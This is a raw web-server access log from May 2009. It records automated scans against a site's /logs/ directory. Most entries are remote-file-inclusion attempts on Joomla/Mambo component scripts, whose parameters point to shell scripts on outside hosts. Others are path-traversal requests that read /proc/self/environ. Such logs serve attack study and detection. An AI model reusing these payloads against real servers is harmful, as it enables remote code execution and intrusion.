85.92.73.149 - - [13/May/2009:08:37:16 -0500] "GET /logs//components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
85.92.73.149 - - [13/May/2009:08:37:16 -0500] "GET //components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
67.204.0.222 - - [13/May/2009:08:38:15 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:08:38:17 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
81.175.71.121 - - [13/May/2009:08:38:36 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
81.175.71.121 - - [13/May/2009:08:38:36 -0500] "GET /logs/access_log.1238112000///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.175.71.121 - - [13/May/2009:08:38:38 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 200 189196 "-""Mozilla/5.0"
213.198.76.196 - - [13/May/2009:08:39:19 -0500] "GET /logs//components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
213.198.76.196 - - [13/May/2009:08:39:19 -0500] "GET //components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
74.55.156.2 - - [13/May/2009:08:39:23 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:08:39:23 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.820"
66.249.67.180 - - [13/May/2009:08:39:30 -0500] "GET /logs/access_log.1121644800 HTTP/1.1" 200 3364 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.18.76.16 - - [13/May/2009:08:39:37 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:08:39:37 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
202.89.33.167 - - [13/May/2009:08:40:05 -0500] "GET /logs//components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
81.175.71.121 - - [13/May/2009:08:40:05 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:08:40:05 -0500] "GET //components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.175.71.121 - - [13/May/2009:08:40:06 -0500] "GET /logs/access_log.1238112000///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.175.71.121 - - [13/May/2009:08:40:06 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 200 189196 "-""Mozilla/5.0"
201.234.41.5 - - [13/May/2009:08:40:17 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:08:40:17 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
201.232.54.48 - - [13/May/2009:08:40:29 -0500] "GET /logs//components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
201.232.54.48 - - [13/May/2009:08:40:29 -0500] "GET //components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
195.93.180.106 - - [13/May/2009:08:42:01 -0500] "GET /logs//components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
195.93.180.106 - - [13/May/2009:08:42:01 -0500] "GET //components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
212.158.163.65 - - [13/May/2009:08:42:02 -0500] "GET /logs//components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
212.158.163.65 - - [13/May/2009:08:42:02 -0500] "GET //components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
212.158.163.65 - - [13/May/2009:08:42:08 -0500] "GET /logs//components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
212.158.163.65 - - [13/May/2009:08:42:08 -0500] "GET //components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:08:42:36 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:08:42:36 -0500] "GET /logs/access_log.1238371200//components/com_simpleboard/image_upload.php?sbp=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:08:42:36 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:08:42:44 -0500] "GET /logs/access_log.1238025600//components/com_simpleboard/image_upload.php?sbp=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
222.236.44.45 - - [13/May/2009:08:42:52 -0500] "GET /logs//components/com_fpslideshow/index.php?mosConfig_absolute_path=http://eopin.com/limesurvey/classes/core/Priv8/SB-iD.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.63"
222.236.44.45 - - [13/May/2009:08:42:52 -0500] "GET //components/com_fpslideshow/index.php?mosConfig_absolute_path=http://eopin.com/limesurvey/classes/core/Priv8/SB-iD.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.63"
201.234.41.5 - - [13/May/2009:08:43:17 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:08:43:17 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
121.165.73.157 - - [13/May/2009:08:43:18 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:08:43:18 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:08:43:18 -0500] "GET /logs/access_log.1238371200//components/com_simpleboard/image_upload.php?sbp=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:08:43:18 -0500] "GET /logs/access_log.1238025600//components/com_simpleboard/image_upload.php?sbp=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.144.136.88 - - [13/May/2009:08:44:02 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.144.136.88 - - [13/May/2009:08:44:02 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
211.144.136.88 - - [13/May/2009:08:44:02 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:08:44:44 -0500] "GET /logs/access_log.1141084800 HTTP/1.1" 200 4737 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.117.191.71 - - [13/May/2009:08:45:21 -0500] "GET /logs//site/index.php?option=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:08:45:21 -0500] "GET //site/index.php?option=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
211.144.136.88 - - [13/May/2009:08:45:21 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
211.144.136.88 - - [13/May/2009:08:45:21 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.144.136.88 - - [13/May/2009:08:45:21 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
67.204.0.222 - - [13/May/2009:08:46:48 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
88.84.130.178 - - [13/May/2009:08:46:49 -0500] "GET //index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kimstroy.by//assets/images/nat.jpg??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
67.204.0.222 - - [13/May/2009:08:46:50 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
217.147.29.190 - - [13/May/2009:08:47:18 -0500] "GET /logs//components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
217.147.29.190 - - [13/May/2009:08:47:19 -0500] "GET //components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
201.234.41.5 - - [13/May/2009:08:47:58 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:08:47:58 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
122.116.178.20 - - [13/May/2009:08:48:53 -0500] "GET /logs/access_log.1238112000///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:08:48:53 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:08:48:53 -0500] "GET /logs/access_log.1239235200///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:08:48:55 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:08:49:19 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:08:49:19 -0500] "GET /logs/access_log.1239235200///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:08:49:19 -0500] "GET /logs/access_log.1238112000///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:08:49:21 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 200 189196 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:08:50:01 -0500] "GET /logs/access_log.1125964800 HTTP/1.1" 200 2117 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
122.116.178.20 - - [13/May/2009:08:50:05 -0500] "GET /logs/access_log.1240272000///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
212.97.132.101 - - [13/May/2009:08:50:10 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://blog.rollespil.dk/wp-admin/images/.readme???? HTTP/1.0" 404 326 "-""libwww-perl/5.53"
212.97.132.101 - - [13/May/2009:08:50:10 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://blog.rollespil.dk/wp-admin/images/.readme???? HTTP/1.0" 404 321 "-""libwww-perl/5.53"
90.156.148.171 - - [13/May/2009:08:53:46 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
90.156.148.171 - - [13/May/2009:08:53:46 -0500] "GET /logs/access_log.1233705600///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
90.156.148.171 - - [13/May/2009:08:53:48 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 200 189196 "-""Mozilla/5.0"
90.156.148.171 - - [13/May/2009:08:54:13 -0500] "GET /logs/access_log.1233878400///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:08:55:23 -0500] "GET /logs/access_log.1109376000 HTTP/1.1" 200 354 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.55.164.230 - - [13/May/2009:08:55:36 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.820"
72.55.164.230 - - [13/May/2009:08:55:36 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.820"
212.97.132.101 - - [13/May/2009:08:57:04 -0500] "GET /poll/poll.php?file_newsportal=http://blog.rollespil.dk/wp-admin/images/.readme???? HTTP/1.0" 404 284 "-""libwww-perl/5.53"
212.97.132.101 - - [13/May/2009:08:57:04 -0500] "GET /logs/poll/poll.php?file_newsportal=http://blog.rollespil.dk/wp-admin/images/.readme???? HTTP/1.0" 404 289 "-""libwww-perl/5.53"
218.38.243.71 - - [13/May/2009:08:58:13 -0500] "GET /logs/access_log.1240531200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
218.38.243.71 - - [13/May/2009:08:58:13 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
218.38.243.71 - - [13/May/2009:08:58:13 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
218.38.243.71 - - [13/May/2009:08:58:21 -0500] "GET /logs/access_log.1239580800/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:08:58:41 -0500] "GET /logs/access_log.1166745600 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.204.0.222 - - [13/May/2009:08:58:51 -0500] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:08:58:51 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
218.38.243.71 - - [13/May/2009:08:59:13 -0500] "GET /logs/access_log.1239494400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:09:00:01 -0500] "GET /environment.php?DIR_PREFIX=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:09:00:01 -0500] "GET /logs/environment.php?DIR_PREFIX=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:09:00:01 -0500] "GET /environment.php?DIR_PREFIX=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:09:00:01 -0500] "GET /logs/environment.php?DIR_PREFIX=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:09:00:01 -0500] "GET /logs/access_log.1233964800/environment.php?DIR_PREFIX=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:09:00:01 -0500] "GET /logs/access_log.1233964800/environment.php?DIR_PREFIX=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:09:00:02 -0500] "GET /logs/access_log.1234396800/environment.php?DIR_PREFIX=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:09:00:02 -0500] "GET /logs/access_log.1234396800/environment.php?DIR_PREFIX=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
124.0.72.2 - - [13/May/2009:09:00:12 -0500] "GET /logs/access_log.1239580800/modules/My_eGallery/index.php?basepath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
124.0.72.2 - - [13/May/2009:09:00:33 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
124.0.72.2 - - [13/May/2009:09:00:33 -0500] "GET /logs/access_log.1231200000/modules/My_eGallery/index.php?basepath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:09:00:37 -0500] "GET /logs/access_log.1191456000 HTTP/1.1" 200 1209 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.94.56.98 - - [13/May/2009:09:03:20 -0500] "GET /administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.depo.org.pk/images/21/ts?? HTTP/1.0" 404 336 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.55.156.2 - - [13/May/2009:09:03:20 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:09:03:20 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.820"
87.106.135.14 - - [13/May/2009:09:03:35 -0500] "GET /logs//site/index.php?option=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:09:03:40 -0500] "GET //site/index.php?option=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.55.156.2 - - [13/May/2009:09:03:55 -0500] "GET /logs/index.php?conteudo=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:09:03:55 -0500] "GET /index.php?conteudo=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.820"
66.249.67.180 - - [13/May/2009:09:05:52 -0500] "GET /logs/access_log.1164499200 HTTP/1.1" 200 654 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.204.0.222 - - [13/May/2009:09:06:01 -0500] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:09:06:02 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
66.11.230.36 - - [13/May/2009:09:07:15 -0500] "GET /logs/access_log.1239926400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
66.11.230.36 - - [13/May/2009:09:07:15 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
66.11.230.36 - - [13/May/2009:09:07:16 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
77.221.130.12 - - [13/May/2009:09:08:22 -0500] "GET /logs/guestbook1//admin.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 309 "-""libwww-perl/5.805"
77.221.130.12 - - [13/May/2009:09:08:22 -0500] "GET /guestbook1//admin.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.805"
91.197.162.90 - - [13/May/2009:09:08:50 -0500] "GET /logs//components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
91.197.162.90 - - [13/May/2009:09:08:51 -0500] "GET //components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
201.76.47.224 - - [13/May/2009:09:09:09 -0500] "GET /logs/guestbook1//admin.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 309 "-""libwww-perl/5.805"
201.76.47.224 - - [13/May/2009:09:09:09 -0500] "GET /guestbook1//admin.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:09:10:23 -0500] "GET /logs/index.php?conteudo=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:09:10:23 -0500] "GET /index.php?conteudo=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
72.249.157.90 - - [13/May/2009:09:11:00 -0500] "GET //?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3245 "-""XXXXXX"
72.249.157.90 - - [13/May/2009:09:11:00 -0500] "GET //?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3245 "-""XXXXXX"
66.249.67.180 - - [13/May/2009:09:11:13 -0500] "GET /logs/access_log.1166313600 HTTP/1.1" 200 1012 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.249.157.90 - - [13/May/2009:09:11:19 -0500] "GET /logs//?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 36689 "-""XXXXXX"
